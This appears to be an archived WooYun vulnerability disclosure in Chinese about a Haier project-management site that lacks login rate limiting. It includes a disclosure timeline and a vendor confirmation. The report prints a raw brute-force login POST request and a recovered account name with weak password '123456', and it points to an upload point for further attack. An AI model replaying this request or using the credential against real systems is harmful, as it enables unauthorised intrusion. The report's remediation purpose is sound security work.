乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-14: 细节已通知厂商并且等待厂商处理中 2015-12-19: 厂商已经确认,细节仅向厂商公开 2015-12-29: 细节向核心白帽子及相关领域专家公开 2016-01-08: 细节向普通白帽子公开 2016-01-18: 细节向实习白帽子公开 2016-02-01: 细节向公众公开
我不能再默默无闻下去了...不要给的分高,rank却给的少!
海尔众创汇项目管理系统:
http://project.haier.net
前期测试输入多次错误密码未发现验证机制,抓包进行爆破post:
POST /zentaopms/www/index.php?m=user&f=login&referer=Lw== HTTP/1.1Host: project.haier.netUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://project.haier.net/zentaopms/www/index.php?m=user&f=login&referer=Lw==Cookie: lang=zh-cn; theme=default; windowWidth=1366; windowHeight=525; sid=tkajbqd8c1efdnhl30oh14cfd1Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 41account=admin&password=123456&referer=%2F
account:xuwei password:123456
这些账户记录下来可以进行二次爆破
有上传点哟
1.验证机制2.修改弱口令
危害等级:中
漏洞Rank:10
确认时间:2015-12-19 00:07
感谢提醒,已安排人员进行处理
暂无